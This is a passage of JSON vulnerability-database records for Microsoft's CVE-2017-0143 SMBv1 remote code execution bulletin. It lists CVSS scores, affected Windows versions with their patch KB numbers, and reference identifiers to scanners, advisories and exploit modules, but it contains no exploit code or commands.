"kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": 
"KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 
1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-03-18T19:17:49", "differentElements": ["cvss2", "cvss3"], "edition": 3}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-07-28T20:07:07", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", 
"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-07-28T20:07:07", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-07-28T20:07:07", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB3212646", "KB4012213", "KB4013429", "KB4012216", "KB3210721", "KB3177186", "KB4012606", "KB4012217", "KBMS16-110, 3187754", "KB4013198", "KB4012598", "KB3210720", "KB4012215", "KB4012212", "KB4012214", "KB3205401", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-07-28T20:07:07", "differentElements": ["msAffectedSoftware"], "edition": 4}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-03T18:46:41", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": 
["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-03T18:46:41", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-03T18:46:41", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB3210721", "KB4012212", "KB3177186", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB4012215", "KB3205409", "KB4012606", "KB3210720", "KB4012598", "KB4012216", "KB4013429", "KB4012214", "KB3213986", "KB4013198", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": 
""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows 
Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", 
"kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": 
